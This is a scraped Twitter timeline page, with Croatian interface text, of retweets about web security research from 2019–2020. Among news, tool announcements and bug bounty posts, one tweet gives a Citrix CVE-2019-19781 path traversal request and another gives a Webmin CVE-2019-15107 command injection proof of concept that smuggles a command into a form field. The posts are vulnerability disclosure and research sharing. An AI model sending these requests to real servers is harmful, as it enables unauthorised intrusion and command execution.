Tweetovi

Blokirali ste korisnika/cu @sam_in_cube

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @sam_in_cube

  1. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    12. pro 2019.

    We're looking to hire a web vulnerability researcher to join and I on the research team, and share their knowledge with the community via

    Poništi
  3. proslijedio/la je Tweet

    I finally wrote a small tool I've wanted for a long time: A parallel testcase minimizer. It's called halfempty, and I'm already finding it useful as part of my fuzzing workflow. /cc

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet

    WebKit: Universal XSS in HTMLFrameElementBase::isURLAllowed

    Poništi
  5. proslijedio/la je Tweet
    24. lis 2019.

    You can now exec Python/JS in Hackvertor! - <("output = input.toUpperCase()","6dcc747e16b8c4e561617b2717c24f45")><@/javascript_0> load a file: <("/mypath/test.py","6dcc747e16b8c4e561617b2717c24f45")><@/python_1> The hash identifies the tag was added by you

    Poništi
  6. proslijedio/la je Tweet

    Looks like the HTTP Request Smuggling vulnerability in Golang had an interesting knock-on impact for Kubernetes

    Poništi
  7. proslijedio/la je Tweet

    Got ideas for achievements that can be unlocked via participation in Google's VRPs? Submit your ideas here:

    Poništi
  8. proslijedio/la je Tweet
    5. lis 2019.

    I learned this week how I can perform an error-based without using any ! It takes advantage of *alternative text* when an object cannot be rendered and then styling it with a *custom font*. My full payload to the chall:

    Poništi
  9. proslijedio/la je Tweet
    26. ruj 2019.

    We are proud to launch our brand new interactive XSS cheatsheet featuring novel vectors from

    Poništi
  10. proslijedio/la je Tweet

    lastpass: bypassing do_popupregister() leaks credentials from previous site

    Poništi
  11. proslijedio/la je Tweet

    LastPass could leak the last used credentials due to a cache not being updated. This was because you can bypass the tab credential cache being populated by including the login form in an unexpected way!

    Poništi
  12. proslijedio/la je Tweet
    6. ruj 2019.

    Scientist: hey you're back early Diver: ocean's haunted Scientist: what? Diver: *loading a pistol and getting back in the submarine* ocean's haunted

    Poništi
  13. proslijedio/la je Tweet
    17. kol 2019.

    "Webmin 0day remote code execution" Tl;Dr: Lack of input validation in the reset password function allows RCE (CVE-2019-15107). Over 13 0000 vulnerable on Shodan. PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet

    Here's a video of the exploit I wrote, I actually had to write a custom rudimentary scripting language 😂

    Poništi
  15. proslijedio/la je Tweet

    🔥 Breaking researcher discloses 20-year-old 'unpatched' vulnerabilities affecting all versions of Windows—from XP to the latest Windows 10. Details ➤ It could allow attackers to gain SYSTEM privileges on a targeted PC.

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    12. kol 2019.
    Poništi
  17. proslijedio/la je Tweet
    8. kol 2019.

    Let’s fuzz the world together! Join us with and at August 22nd, 5pm, San Francisco

    Poništi
  18. proslijedio/la je Tweet
    7. kol 2019.
    Poništi
  19. proslijedio/la je Tweet
    4. kol 2019.

    One of the stranger bugs I found last year while developing Param Miner

    Poništi
  20. proslijedio/la je Tweet
    30. srp 2019.

    "Passive income" opportunity for security researchers: submit your fuzzers to the Chrome Fuzzer Program and receive rewards for vulnerabilities found (with an extra $1K bonus for each vuln). teaches how to do it successfully

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·